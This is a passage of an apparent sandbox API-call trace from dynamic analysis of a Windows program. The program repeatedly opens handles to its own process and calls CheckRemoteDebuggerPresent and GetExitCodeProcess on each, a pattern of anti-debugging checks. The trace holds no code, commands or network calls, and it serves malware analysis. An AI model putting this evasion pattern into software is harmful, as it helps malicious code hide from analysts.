lpExitCode=0x28a89a8*=0x103) returned 1 [0169.200] CheckRemoteDebuggerPresent (in: hProcess=0x490, pbDebuggerPresent=0x33d360 | out: pbDebuggerPresent=0x33d360) returned 1 [0169.200] GetExitCodeProcess (in: hProcess=0x494, lpExitCode=0x28a8a60 | out: lpExitCode=0x28a8a60*=0x103) returned 1 [0169.200] CheckRemoteDebuggerPresent (in: hProcess=0x494, pbDebuggerPresent=0x33d360 | out: pbDebuggerPresent=0x33d360) returned 1 [0169.200] GetExitCodeProcess (in: hProcess=0x498, lpExitCode=0x28a8b18 | out: lpExitCode=0x28a8b18*=0x103) returned 1 [0169.200] CheckRemoteDebuggerPresent (in: hProcess=0x498, pbDebuggerPresent=0x33d360 | out: pbDebuggerPresent=0x33d360) returned 1 [0169.200] GetExitCodeProcess (in: hProcess=0x49c, lpExitCode=0x28a8bd0 | out: lpExitCode=0x28a8bd0*=0x103) returned 1 [0169.201] CheckRemoteDebuggerPresent (in: hProcess=0x49c, pbDebuggerPresent=0x33d360 | out: pbDebuggerPresent=0x33d360) returned 1 [0169.201] GetExitCodeProcess (in: hProcess=0x4a0, lpExitCode=0x28a8c88 | out: lpExitCode=0x28a8c88*=0x103) returned 1 [0169.201] CheckRemoteDebuggerPresent (in: hProcess=0x4a0, pbDebuggerPresent=0x33d360 | out: pbDebuggerPresent=0x33d360) returned 1 [0169.201] GetExitCodeProcess (in: hProcess=0x4a4, lpExitCode=0x28a8d40 | out: lpExitCode=0x28a8d40*=0x103) returned 1 [0169.201] CheckRemoteDebuggerPresent (in: hProcess=0x4a4, pbDebuggerPresent=0x33d360 | out: pbDebuggerPresent=0x33d360) returned 1 [0169.201] GetExitCodeProcess (in: hProcess=0x4a8, lpExitCode=0x28a8df8 | out: lpExitCode=0x28a8df8*=0x103) returned 1 [0169.201] CheckRemoteDebuggerPresent (in: hProcess=0x4a8, pbDebuggerPresent=0x33d360 | out: pbDebuggerPresent=0x33d360) returned 1 [0169.201] GetExitCodeProcess (in: hProcess=0x4ac, lpExitCode=0x28a8eb0 | out: lpExitCode=0x28a8eb0*=0x103) returned 1 [0169.201] CheckRemoteDebuggerPresent (in: hProcess=0x4ac, pbDebuggerPresent=0x33d360 | out: pbDebuggerPresent=0x33d360) returned 1 [0169.201] GetExitCodeProcess (in: hProcess=0x4b0, lpExitCode=0x28a8f68 | out: lpExitCode=0x28a8f68*=0x103) returned 1 [0169.202] CheckRemoteDebuggerPresent (in: hProcess=0x4b0, pbDebuggerPresent=0x33d360 | out: pbDebuggerPresent=0x33d360) returned 1 [0169.202] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x530) returned 0x4b4 [0169.202] GetExitCodeProcess (in: hProcess=0x4b4, lpExitCode=0x28a9020 | out: lpExitCode=0x28a9020*=0x103) returned 1 [0169.202] CheckRemoteDebuggerPresent (in: hProcess=0x4b4, pbDebuggerPresent=0x33d360 | out: pbDebuggerPresent=0x33d360) returned 1 [0169.202] GetExitCodeProcess (in: hProcess=0x4b8, lpExitCode=0x28a90d8 | out: lpExitCode=0x28a90d8*=0x103) returned 1 [0169.202] CheckRemoteDebuggerPresent (in: hProcess=0x4b8, pbDebuggerPresent=0x33d360 | out: pbDebuggerPresent=0x33d360) returned 1 [0169.202] GetExitCodeProcess (in: hProcess=0x4bc, lpExitCode=0x28a9190 | out: lpExitCode=0x28a9190*=0x103) returned 1 [0169.202] CheckRemoteDebuggerPresent (in: hProcess=0x4bc, pbDebuggerPresent=0x33d360 | out: pbDebuggerPresent=0x33d360) returned 1 [0169.202] GetExitCodeProcess (in: hProcess=0x4c0, lpExitCode=0x28a9248 | out: lpExitCode=0x28a9248*=0x103) returned 1 [0169.202] CheckRemoteDebuggerPresent (in: hProcess=0x4c0, pbDebuggerPresent=0x33d360 | out: pbDebuggerPresent=0x33d360) returned 1 [0169.203] GetExitCodeProcess (in: hProcess=0x4c4, lpExitCode=0x28a9300 | out: lpExitCode=0x28a9300*=0x103) returned 1 [0169.203] CheckRemoteDebuggerPresent (in: hProcess=0x4c4, pbDebuggerPresent=0x33d360 | out: pbDebuggerPresent=0x33d360) returned 1 [0169.203] GetExitCodeProcess (in: hProcess=0x4c8, lpExitCode=0x28a93b8 | out: lpExitCode=0x28a93b8*=0x103) returned 1 [0169.203] CheckRemoteDebuggerPresent (in: hProcess=0x4c8, pbDebuggerPresent=0x33d360 | out: pbDebuggerPresent=0x33d360) returned 1 [0169.203] GetExitCodeProcess (in: hProcess=0x4cc, lpExitCode=0x28a9470 | out: lpExitCode=0x28a9470*=0x103) returned 1 [0169.203] CheckRemoteDebuggerPresent (in: hProcess=0x4cc, pbDebuggerPresent=0x33d360 | out: pbDebuggerPresent=0x33d360) returned 1 [0169.203] GetExitCodeProcess (in: hProcess=0x4d0, lpExitCode=0x28a9528 | out: lpExitCode=0x28a9528*=0x103) returned 1 [0169.203] CheckRemoteDebuggerPresent (in: hProcess=0x4d0, pbDebuggerPresent=0x33d360 | out: pbDebuggerPresent=0x33d360) returned 1 [0169.203] GetExitCodeProcess (in: hProcess=0x4d4, lpExitCode=0x28a95e0 | out: lpExitCode=0x28a95e0*=0x103) returned 1 [0169.203] CheckRemoteDebuggerPresent (in: hProcess=0x4d4, pbDebuggerPresent=0x33d360 | out: pbDebuggerPresent=0x33d360) returned 1 [0169.203] GetExitCodeProcess (in: hProcess=0x4d8, lpExitCode=0x28a9698 | out: lpExitCode=0x28a9698*=0x103) returned 1 [0169.204] CheckRemoteDebuggerPresent (in: hProcess=0x4d8, pbDebuggerPresent=0x33d360 | out: pbDebuggerPresent=0x33d360) returned 1 [0169.204] GetExitCodeProcess (in: hProcess=0x4dc, lpExitCode=0x28a9750 | out: lpExitCode=0x28a9750*=0x103) returned 1 [0169.204] CheckRemoteDebuggerPresent (in: hProcess=0x4dc, pbDebuggerPresent=0x33d360 | out: pbDebuggerPresent=0x33d360) returned 1 [0169.204] GetExitCodeProcess (in: hProcess=0x4e0, lpExitCode=0x28a9808 | out: lpExitCode=0x28a9808*=0x103) returned 1 [0169.204] CheckRemoteDebuggerPresent (in: hProcess=0x4e0, pbDebuggerPresent=0x33d360 | out: pbDebuggerPresent=0x33d360) returned 1 [0169.204] GetExitCodeProcess (in: hProcess=0x4e4, lpExitCode=0x28a98c0 | out: lpExitCode=0x28a98c0*=0x103) returned 1 [0169.204] CheckRemoteDebuggerPresent (in: hProcess=0x4e4, pbDebuggerPresent=0x33d360 | out: pbDebuggerPresent=0x33d360) returned 1 [0169.204] GetCurrentProcessId () returned 0x530 [0169.204] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x530) returned 0x4e8 [0169.204] GetExitCodeProcess (in: hProcess=0x4e8, lpExitCode=0x28a9978 | out: lpExitCode=0x28a9978*=0x103) returned 1 [0169.204] CheckRemoteDebuggerPresent (in: hProcess=0x4e8, pbDebuggerPresent=0x33d360 | out: pbDebuggerPresent=0x33d360) returned 1 [0169.205] GetExitCodeProcess (in: hProcess=0x4ec, lpExitCode=0x28a9a30 | out: lpExitCode=0x28a9a30*=0x103) returned 1 [0169.205] CheckRemoteDebuggerPresent (in: hProcess=0x4ec, pbDebuggerPresent=0x33d360 | out: pbDebuggerPresent=0x33d360) returned 1 [0169.205] GetExitCodeProcess (in: hProcess=0x4f0, lpExitCode=0x28a9ae8 | out: lpExitCode=0x28a9ae8*=0x103) returned 1 [0169.205] CheckRemoteDebuggerPresent (in: hProcess=0x4f0, pbDebuggerPresent=0x33d360 | out: pbDebuggerPresent=0x33d360) returned 1 [0169.205] GetExitCodeProcess (in: hProcess=0x4f4, lpExitCode=0x28a9ba0 | out: lpExitCode=0x28a9ba0*=0x103) returned 1 [0169.205] CheckRemoteDebuggerPresent (in: hProcess=0x4f4, pbDebuggerPresent=0x33d360 | out: pbDebuggerPresent=0x33d360) returned 1 [0169.205] GetExitCodeProcess (in: hProcess=0x4f8, lpExitCode=0x28a9c58 | out: lpExitCode=0x28a9c58*=0x103) returned 1 [0169.205] CheckRemoteDebuggerPresent (in: hProcess=0x4f8, pbDebuggerPresent=0x33d360 | out: pbDebuggerPresent=0x33d360) returned 1 [0169.205] GetExitCodeProcess (in: hProcess=0x4fc, lpExitCode=0x28a9d10 | out: lpExitCode=0x28a9d10*=0x103) returned 1 [0169.206] CheckRemoteDebuggerPresent (in: hProcess=0x4fc, pbDebuggerPresent=0x33d360 | out: pbDebuggerPresent=0x33d360) returned 1 [0169.206] GetExitCodeProcess (in: hProcess=0x500, lpExitCode=0x28a9dc8 | out: lpExitCode=0x28a9dc8*=0x103) returned 1 [0169.206] CheckRemoteDebuggerPresent (in: hProcess=0x500, pbDebuggerPresent=0x33d360 | out: pbDebuggerPresent=0x33d360) returned 1 [0169.206] GetExitCodeProcess (in: hProcess=0x504, lpExitCode=0x28a9e80 | out: lpExitCode=0x28a9e80*=0x103) returned 1 [0169.206] CheckRemoteDebuggerPresent (in: hProcess=0x504, pbDebuggerPresent=0x33d360 | out: pbDebuggerPresent=0x33d360) returned 1 [0169.206] GetExitCodeProcess (in: hProcess=0x508, lpExitCode=0x28a9f38 | out: lpExitCode=0x28a9f38*=0x103) returned 1 [0169.206] CheckRemoteDebuggerPresent (in: hProcess=0x508, pbDebuggerPresent=0x33d360 | out: pbDebuggerPresent=0x33d360) returned 1 [0169.206] GetExitCodeProcess (in: hProcess=0x50c, lpExitCode=0x28a9ff0 | out: lpExitCode=0x28a9ff0*=0x103) returned 1 [0169.206] CheckRemoteDebuggerPresent (in: hProcess=0x50c, pbDebuggerPresent=0x33d360 | out: pbDebuggerPresent=0x33d360) returned 1 [0169.206] GetExitCodeProcess (in: hProcess=0x510, lpExitCode=0x28aa0a8 | out: lpExitCode=0x28aa0a8*=0x103) returned 1 [0169.207] CheckRemoteDebuggerPresent (in: hProcess=0x510, pbDebuggerPresent=0x33d360 | out: pbDebuggerPresent=0x33d360) returned 1 [0169.207] GetExitCodeProcess (in: hProcess=0x514, lpExitCode=0x28aa160 | out: lpExitCode=0x28aa160*=0x103) returned 1 [0169.207] CheckRemoteDebuggerPresent (in: hProcess=0x514, pbDebuggerPresent=0x33d360 | out: pbDebuggerPresent=0x33d360) returned 1 [0169.207] GetExitCodeProcess (in: hProcess=0x518, lpExitCode=0x28aa218 | out: lpExitCode=0x28aa218*=0x103) returned 1 [0169.207] CheckRemoteDebuggerPresent (in: hProcess=0x518, pbDebuggerPresent=0x33d360 | out: pbDebuggerPresent=0x33d360) returned 1 [0169.207] GetExitCodeProcess (in: hProcess=0x51c, lpExitCode=0x28aa2d0 | out: lpExitCode=0x28aa2d0*=0x103) returned 1 [0169.207] CheckRemoteDebuggerPresent (in: hProcess=0x51c, pbDebuggerPresent=0x33d360 | out: pbDebuggerPresent=0x33d360) returned 1 [0169.207] GetExitCodeProcess (in: hProcess=0x520, lpExitCode=0x28aa388 | out: lpExitCode=0x28aa388*=0x103) returned 1 [0169.207] CheckRemoteDebuggerPresent (in: hProcess=0x520, pbDebuggerPresent=0x33d360 | out: pbDebuggerPresent=0x33d360) returned 1 [0169.207] GetExitCodeProcess (in: hProcess=0x524, lpExitCode=0x28aa440 | out: lpExitCode=0x28aa440*=0x103) returned 1 [0169.207] CheckRemoteDebuggerPresent (in: hProcess=0x524, pbDebuggerPresent=0x33d360 | out: pbDebuggerPresent=0x33d360) returned 1 [0169.208] GetExitCodeProcess (in: hProcess=0x528, lpExitCode=0x28aa4f8 | out: lpExitCode=0x28aa4f8*=0x103) returned 1 [0169.208] CheckRemoteDebuggerPresent (in: hProcess=0x528, pbDebuggerPresent=0x33d360 | out: pbDebuggerPresent=0x33d360) returned 1 [0169.208] GetExitCodeProcess (in: hProcess=0x52c, lpExitCode=0x28aa5b0 | out: lpExitCode=0x28aa5b0*=0x103) returned 1 [0169.208] CheckRemoteDebuggerPresent (in: hProcess=0x52c, pbDebuggerPresent=0x33d360 | out: pbDebuggerPresent=0x33d360) returned 1 [0169.208] GetExitCodeProcess (in: hProcess=0x530, lpExitCode=0x28aa668 | out: lpExitCode=0x28aa668*=0x103) returned 1 [0169.208] CheckRemoteDebuggerPresent (in: hProcess=0x530, pbDebuggerPresent=0x33d360 | out: pbDebuggerPresent=0x33d360) returned 1 [0169.208] GetExitCodeProcess (in: hProcess=0x534, lpExitCode=0x28aa720 | out: lpExitCode=0x28aa720*=0x103) returned 1 [0169.208] CheckRemoteDebuggerPresent (in: hProcess=0x534, pbDebuggerPresent=0x33d360 | out: pbDebuggerPresent=0x33d360) returned 1 [0169.208] GetExitCodeProcess (in: hProcess=0x538, lpExitCode=0x28aa7d8 | out: lpExitCode=0x28aa7d8*=0x103) returned 1 [0169.208] CheckRemoteDebuggerPresent (in: hProcess=0x538, pbDebuggerPresent=0x33d360 | out: pbDebuggerPresent=0x33d360) returned 1 [0169.208] GetExitCodeProcess (in: hProcess=0x53c, lpExitCode=0x28aa890 | out: lpExitCode=0x28aa890*=0x103) returned 1 [0169.209] CheckRemoteDebuggerPresent (in: hProcess=0x53c, pbDebuggerPresent=0x33d360 | out: pbDebuggerPresent=0x33d360) returned 1 [0169.209] GetExitCodeProcess (in: hProcess=0x540, lpExitCode=0x28aa948 | out: lpExitCode=0x28aa948*=0x103) returned 1 [0169.209] CheckRemoteDebuggerPresent (in: hProcess=0x540, pbDebuggerPresent=0x33d360 | out: pbDebuggerPresent=0x33d360) returned 1 [0169.209] GetCurrentProcessId () returned 0x530 [0169.209] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x530) returned 0x544 [0169.209] GetExitCodeProcess (in: hProcess=0x544, lpExitCode=0x28aaa00 | out: lpExitCode=0x28aaa00*=0x103) returned 1 [0169.209] CheckRemoteDebuggerPresent (in: hProcess=0x544, pbDebuggerPresent=0x33d360 | out: pbDebuggerPresent=0x33d360) returned 1 [0169.209] GetExitCodeProcess (in: hProcess=0x548, lpExitCode=0x28aaab8 | out: lpExitCode=0x28aaab8*=0x103) returned 1 [0169.209] CheckRemoteDebuggerPresent (in: hProcess=0x548, pbDebuggerPresent=0x33d360 | out: pbDebuggerPresent=0x33d360) returned 1 [0169.209] GetExitCodeProcess (in: hProcess=0x54c, lpExitCode=0x28aab70 | out: lpExitCode=0x28aab70*=0x103) returned 1 [0169.209] CheckRemoteDebuggerPresent (in: hProcess=0x54c, pbDebuggerPresent=0x33d360 | out: pbDebuggerPresent=0x33d360) returned 1 [0169.210] GetExitCodeProcess (in: hProcess=0x550, lpExitCode=0x28aac28 | out: lpExitCode=0x28aac28*=0x103) returned 1 [0169.210] CheckRemoteDebuggerPresent (in: hProcess=0x550, pbDebuggerPresent=0x33d360 | out: pbDebuggerPresent=0x33d360) returned 1 [0169.210] GetExitCodeProcess (in: hProcess=0x554, lpExitCode=0x28aace0 | out: lpExitCode=0x28aace0*=0x103) returned 1 [0169.210] CheckRemoteDebuggerPresent (in: hProcess=0x554, pbDebuggerPresent=0x33d360 | out: pbDebuggerPresent=0x33d360) returned 1 [0169.210] GetExitCodeProcess (in: hProcess=0x558, lpExitCode=0x28aad98 | out: lpExitCode=0x28aad98*=0x103) returned 1 [0169.210] CheckRemoteDebuggerPresent (in: hProcess=0x558, pbDebuggerPresent=0x33d360 | out: pbDebuggerPresent=0x33d360) returned 1 [0169.210] GetExitCodeProcess (in: hProcess=0x55c, lpExitCode=0x28aae50 | out: lpExitCode=0x28aae50*=0x103) returned 1 [0169.210] CheckRemoteDebuggerPresent (in: hProcess=0x55c, pbDebuggerPresent=0x33d360 | out: pbDebuggerPresent=0x33d360) returned 1 [0169.210] GetExitCodeProcess (in: hProcess=0x560, lpExitCode=0x28aaf08 | out: lpExitCode=0x28aaf08*=0x103) returned 1 [0169.210] CheckRemoteDebuggerPresent (in: hProcess=0x560, pbDebuggerPresent=0x33d360 | out: pbDebuggerPresent=0x33d360) returned 1 [0169.210] GetExitCodeProcess (in: hProcess=0x564, lpExitCode=0x28aafc0 | out: lpExitCode=0x28aafc0*=0x103) returned 1 [0169.210] CheckRemoteDebuggerPresent (in: hProcess=0x564, pbDebuggerPresent=0x33d360 | out: pbDebuggerPresent=0x33d360) returned 1 [0169.211] GetExitCodeProcess (in: hProcess=0x568, lpExitCode=0x28ab078 | out: lpExitCode=0x28ab078*=0x103) returned 1 [0169.211] CheckRemoteDebuggerPresent (in: hProcess=0x568, pbDebuggerPresent=0x33d360 | out: pbDebuggerPresent=0x33d360) returned 1 [0169.211] GetExitCodeProcess (in: hProcess=0x56c, lpExitCode=0x28ab130 | out: lpExitCode=0x28ab130*=0x103) returned 1 [0169.211] CheckRemoteDebuggerPresent (in: hProcess=0x56c, pbDebuggerPresent=0x33d360 | out: pbDebuggerPresent=0x33d360) returned 1 [0169.211] GetExitCodeProcess (in: hProcess=0x570, lpExitCode=0x28ab1e8 | out: lpExitCode=0x28ab1e8*=0x103) returned 1 [0169.211] CheckRemoteDebuggerPresent (in: hProcess=0x570, pbDebuggerPresent=0x33d360 | out: pbDebuggerPresent=0x33d360) returned 1 [0169.211] GetExitCodeProcess (in: hProcess=0x574, lpExitCode=0x28ab2a0 | out: lpExitCode=0x28ab2a0*=0x103) returned 1 [0169.211] CheckRemoteDebuggerPresent (in: hProcess=0x574, pbDebuggerPresent=0x33d360 | out: pbDebuggerPresent=0x33d360) returned 1 [0169.211] GetExitCodeProcess (in: hProcess=0x578, lpExitCode=0x28ab358 | out: lpExitCode=0x28ab358*=0x103) returned 1 [0169.211] CheckRemoteDebuggerPresent (in: hProcess=0x578, pbDebuggerPresent=0x33d360 | out: pbDebuggerPresent=0x33d360) returned 1 [0169.211] GetExitCodeProcess (in: hProcess=0x57c, lpExitCode=0x28ab410 | out: lpExitCode=0x28ab410*=0x103) returned 1 [0169.212] CheckRemoteDebuggerPresent (in: hProcess=0x57c, pbDebuggerPresent=0x33d360 | out: pbDebuggerPresent=0x33d360) returned 1 [0169.212] GetExitCodeProcess (in: hProcess=0x580, lpExitCode=0x28ab4c8 | out: lpExitCode=0x28ab4c8*=0x103) returned 1 [0169.212] CheckRemoteDebuggerPresent (in: hProcess=0x580, pbDebuggerPresent=0x33d360 | out: pbDebuggerPresent=0x33d360) returned 1 [0169.212] GetExitCodeProcess (in: hProcess=0x584, lpExitCode=0x28ab580 | out: lpExitCode=0x28ab580*=0x103) returned 1 [0169.212] CheckRemoteDebuggerPresent (in: hProcess=0x584, pbDebuggerPresent=0x33d360 | out: pbDebuggerPresent=0x33d360) returned 1 [0169.212] GetExitCodeProcess (in: hProcess=0x588, lpExitCode=0x28ab638 | out: lpExitCode=0x28ab638*=0x103) returned 1 [0169.212] CheckRemoteDebuggerPresent (in: hProcess=0x588, pbDebuggerPresent=0x33d360 | out: pbDebuggerPresent=0x33d360) returned 1 [0169.212] GetExitCodeProcess (in: hProcess=0x58c, lpExitCode=0x28ab6f0 | out: lpExitCode=0x28ab6f0*=0x103) returned 1 [0169.212] CheckRemoteDebuggerPresent (in: hProcess=0x58c, pbDebuggerPresent=0x33d360 | out: pbDebuggerPresent=0x33d360) returned 1 [0169.212] GetExitCodeProcess (in: hProcess=0x590, lpExitCode=0x28ab7a8 | out: lpExitCode=0x28ab7a8*=0x103) returned 1 [0169.212] CheckRemoteDebuggerPresent (in: hProcess=0x590, pbDebuggerPresent=0x33d360 | out: pbDebuggerPresent=0x33d360) returned 1 [0169.213] GetExitCodeProcess (in: hProcess=0x594, lpExitCode=0x28ab860 | out: lpExitCode=0x28ab860*=0x103) returned 1 [0169.213] CheckRemoteDebuggerPresent (in: hProcess=0x594, pbDebuggerPresent=0x33d360 | out: pbDebuggerPresent=0x33d360) returned 1 [0169.213] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x530) returned 0x598 [0169.213] GetExitCodeProcess (in: hProcess=0x598, lpExitCode=0x28ab918 | out: lpExitCode=0x28ab918*=0x103) returned 1 [0169.213] CheckRemoteDebuggerPresent (in: hProcess=0x598, pbDebuggerPresent=0x33d360 | out: pbDebuggerPresent=0x33d360) returned 1 [0169.213] GetExitCodeProcess (in: hProcess=0x59c, lpExitCode=0x28ab9d0 | out: lpExitCode=0x28ab9d0*=0x103) returned 1 [0169.213] CheckRemoteDebuggerPresent (in: hProcess=0x59c, pbDebuggerPresent=0x33d360 | out: pbDebuggerPresent=0x33d360) returned 1 [0169.213] GetExitCodeProcess (in: hProcess=0x5a0, lpExitCode=0x28aba88 | out: lpExitCode=0x28aba88*=0x103) returned 1 [0169.213] CheckRemoteDebuggerPresent (in: hProcess=0x5a0, pbDebuggerPresent=0x33d360 | out: pbDebuggerPresent=0x33d360) returned 1 [0169.214] GetExitCodeProcess (in: hProcess=0x5a4, lpExitCode=0x28abb40 | out: lpExitCode=0x28abb40*=0x103) returned 1 [0169.214] CheckRemoteDebuggerPresent (in: hProcess=0x5a4, pbDebuggerPresent=0x33d360 | out: pbDebuggerPresent=0x33d360) returned 1 [0169.214] GetExitCodeProcess (in: hProcess=0x5a8, lpExitCode=0x28abbf8 | out: lpExitCode=0x28abbf8*=0x103) returned 1 [0169.214] CheckRemoteDebuggerPresent (in: hProcess=0x5a8, pbDebuggerPresent=0x33d360 | out: pbDebuggerPresent=0x33d360) returned 1 [0169.214] GetExitCodeProcess (in: hProcess=0x5ac, lpExitCode=0x28abcb0 | out: lpExitCode=0x28abcb0*=0x103) returned 1 [0169.214] CheckRemoteDebuggerPresent (in: hProcess=0x5ac, pbDebuggerPresent=0x33d360 | out: pbDebuggerPresent=0x33d360) returned 1 [0169.214] GetExitCodeProcess (in: hProcess=0x5b0, lpExitCode=0x28abd68 | out: lpExitCode=0x28abd68*=0x103) returned 1 [0169.214] CheckRemoteDebuggerPresent (in: hProcess=0x5b0, pbDebuggerPresent=0x33d360 | out: pbDebuggerPresent=0x33d360) returned 1 [0169.215] GetExitCodeProcess (in: hProcess=0x5b4, lpExitCode=0x28abe20 | out: lpExitCode=0x28abe20*=0x103) returned 1 [0169.215] CheckRemoteDebuggerPresent (in: hProcess=0x5b4, pbDebuggerPresent=0x33d360 | out: pbDebuggerPresent=0x33d360) returned 1 [0169.215] GetExitCodeProcess (in: hProcess=0x5b8, lpExitCode=0x28abed8 | out: lpExitCode=0x28abed8*=0x103) returned 1 [0169.215] CheckRemoteDebuggerPresent (in: hProcess=0x5b8, pbDebuggerPresent=0x33d360 | out: pbDebuggerPresent=0x33d360) returned 1 [0169.215] GetExitCodeProcess (in: hProcess=0x5bc, lpExitCode=0x28abf90 | out: lpExitCode=0x28abf90*=0x103) returned 1 [0169.215] CheckRemoteDebuggerPresent (in: hProcess=0x5bc, pbDebuggerPresent=0x33d360 | out: pbDebuggerPresent=0x33d360) returned 1 [0169.215] GetExitCodeProcess (in: hProcess=0x5c0, lpExitCode=0x28ac048 | out: lpExitCode=0x28ac048*=0x103) returned 1 [0169.215] CheckRemoteDebuggerPresent (in: hProcess=0x5c0, pbDebuggerPresent=0x33d360 | out: pbDebuggerPresent=0x33d360) returned 1 [0169.215] GetExitCodeProcess (in: hProcess=0x5c4, lpExitCode=0x28ac100 | out: lpExitCode=0x28ac100*=0x103) returned 1 [0169.215] CheckRemoteDebuggerPresent (in: hProcess=0x5c4, pbDebuggerPresent=0x33d360 | out: pbDebuggerPresent=0x33d360) returned 1 [0169.215] GetExitCodeProcess (in: hProcess=0x5c8, lpExitCode=0x28ac1b8 | out: lpExitCode=0x28ac1b8*=0x103) returned 1 [0169.216] CheckRemoteDebuggerPresent (in: hProcess=0x5c8, pbDebuggerPresent=0x33d360 | out: pbDebuggerPresent=0x33d360) returned 1 [0169.216] GetExitCodeProcess (in: hProcess=0x5cc, lpExitCode=0x28ac270 | out: lpExitCode=0x28ac270*=0x103) returned 1 [0169.216] CheckRemoteDebuggerPresent (in: hProcess=0x5cc, pbDebuggerPresent=0x33d360 | out: pbDebuggerPresent=0x33d360) returned 1 [0169.216] GetExitCodeProcess (in: hProcess=0x5d0, lpExitCode=0x28ac328 | out: lpExitCode=0x28ac328*=0x103) returned 1 [0169.216] CheckRemoteDebuggerPresent (in: hProcess=0x5d0, pbDebuggerPresent=0x33d360 | out: pbDebuggerPresent=0x33d360) returned 1 [0169.216] GetExitCodeProcess (in: hProcess=0x5d4, lpExitCode=0x28ac3e0 | out: lpExitCode=0x28ac3e0*=0x103) returned 1 [0169.216] CheckRemoteDebuggerPresent (in: hProcess=0x5d4, pbDebuggerPresent=0x33d360 | out: pbDebuggerPresent=0x33d360) returned 1 [0169.216] GetExitCodeProcess (in: hProcess=0x5d8, lpExitCode=0x28ac498 | out: lpExitCode=0x28ac498*=0x103) returned 1 [0169.216] CheckRemoteDebuggerPresent (in: hProcess=0x5d8, pbDebuggerPresent=0x33d360 | out: pbDebuggerPresent=0x33d360) returned 1 [0169.216] GetExitCodeProcess (in: hProcess=0x5dc, lpExitCode=0x28ac550 | out: lpExitCode=0x28ac550*=0x103) returned 1 [0169.216] CheckRemoteDebuggerPresent (in: hProcess=0x5dc, pbDebuggerPresent=0x33d360 | out: pbDebuggerPresent=0x33d360) returned 1 [0169.217] GetExitCodeProcess (in: hProcess=0x5e0, lpExitCode=0x28ac608 | out: lpExitCode=0x28ac608*=0x103) returned 1 [0169.217] CheckRemoteDebuggerPresent (in: hProcess=0x5e0, pbDebuggerPresent=0x33d360 | out: pbDebuggerPresent=0x33d360) returned 1 [0169.217] GetExitCodeProcess (in: hProcess=0x5e4, lpExitCode=0x28ac6c0 | out: lpExitCode=0x28ac6c0*=0x103) returned 1 [0169.217] CheckRemoteDebuggerPresent (in: hProcess=0x5e4, pbDebuggerPresent=0x33d360 | out: pbDebuggerPresent=0x33d360) returned 1 [0169.217] GetExitCodeProcess (in: hProcess=0x5e8, lpExitCode=0x28ac778 | out: lpExitCode=0x28ac778*=0x103) returned 1 [0169.217] CheckRemoteDebuggerPresent (in: hProcess=0x5e8, pbDebuggerPresent=0x33d360 | out: pbDebuggerPresent=0x33d360) returned 1 [0169.217] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x530) returned 0x5ec [0169.217] GetExitCodeProcess (in: hProcess=0x5ec, lpExitCode=0x28ac830 | out: lpExitCode=0x28ac830*=0x103) returned 1 [0169.217] CheckRemoteDebuggerPresent (in: hProcess=0x5ec, pbDebuggerPresent=0x33d360 | out: pbDebuggerPresent=0x33d360) returned 1 [0169.217] GetExitCodeProcess (in: hProcess=0x5f0, lpExitCode=0x28ac8e8 | out: lpExitCode=0x28ac8e8*=0x103) returned 1 [0169.218] CheckRemoteDebuggerPresent (in: hProcess=0x5f0, pbDebuggerPresent=0x33d360 | out: pbDebuggerPresent=0x33d360) returned 1 [0169.218] GetExitCodeProcess (in: hProcess=0x5f4, lpExitCode=0x28ac9a0 | out: lpExitCode=0x28ac9a0*=0x103) returned 1 [0169.218] CheckRemoteDebuggerPresent (in: hProcess=0x5f4, pbDebuggerPresent=0x33d360 | out: pbDebuggerPresent=0x33d360) returned 1 [0169.218] GetExitCodeProcess (in: hProcess=0x5f8, lpExitCode=0x28aca58 | out: lpExitCode=0x28aca58*=0x103) returned 1 [0169.218] CheckRemoteDebuggerPresent (in: hProcess=0x5f8, pbDebuggerPresent=0x33d360 | out: pbDebuggerPresent=0x33d360) returned 1 [0169.218] GetExitCodeProcess (in: hProcess=0x5fc, lpExitCode=0x28acb10 | out: lpExitCode=0x28acb10*=0x103) returned 1 [0169.218] CheckRemoteDebuggerPresent (in: hProcess=0x5fc, pbDebuggerPresent=0x33d360 | out: pbDebuggerPresent=0x33d360) returned 1 [0169.218] GetExitCodeProcess (in: hProcess=0x600, lpExitCode=0x28acbc8 | out: lpExitCode=0x28acbc8*=0x103) returned 1 [0169.218] CheckRemoteDebuggerPresent (in: hProcess=0x600, pbDebuggerPresent=0x33d360 | out: pbDebuggerPresent=0x33d360) returned 1 [0169.218] GetExitCodeProcess (in: hProcess=0x604, lpExitCode=0x28acc80 | out: lpExitCode=0x28acc80*=0x103) returned 1 [0169.218] CheckRemoteDebuggerPresent (in: hProcess=0x604, pbDebuggerPresent=0x33d360 | out: pbDebuggerPresent=0x33d360) returned 1 [0169.219] GetExitCodeProcess (in: hProcess=0x608, lpExitCode=0x28acd38 | out: lpExitCode=0x28acd38*=0x103) returned 1 [0169.219] CheckRemoteDebuggerPresent (in: hProcess=0x608, pbDebuggerPresent=0x33d360 | out: pbDebuggerPresent=0x33d360) returned 1 [0169.219] GetExitCodeProcess (in: hProcess=0x60c, lpExitCode=0x28acdf0 | out: lpExitCode=0x28acdf0*=0x103) returned 1 [0169.219] CheckRemoteDebuggerPresent (in: hProcess=0x60c, pbDebuggerPresent=0x33d360 | out: pbDebuggerPresent=0x33d360) returned 1 [0169.219] GetExitCodeProcess (in: hProcess=0x610, lpExitCode=0x28acea8 | out: lpExitCode=0x28acea8*=0x103) returned 1 [0169.219] CheckRemoteDebuggerPresent (in: hProcess=0x610, pbDebuggerPresent=0x33d360 | out: pbDebuggerPresent=0x33d360) returned 1 [0169.219] GetExitCodeProcess (in: hProcess=0x614, lpExitCode=0x28acf60 | out: lpExitCode=0x28acf60*=0x103) returned 1 [0169.219] CheckRemoteDebuggerPresent (in: hProcess=0x614, pbDebuggerPresent=0x33d360 | out: pbDebuggerPresent=0x33d360) returned 1 [0169.219] GetExitCodeProcess (in: hProcess=0x618, lpExitCode=0x28ad018 | out: lpExitCode=0x28ad018*=0x103) returned 1 [0169.219] CheckRemoteDebuggerPresent (in: hProcess=0x618, pbDebuggerPresent=0x33d360 | out: pbDebuggerPresent=0x33d360) returned 1 [0169.219] GetExitCodeProcess (in: hProcess=0x61c, lpExitCode=0x28ad0d0 | out: lpExitCode=0x28ad0d0*=0x103) returned 1 [0169.219] 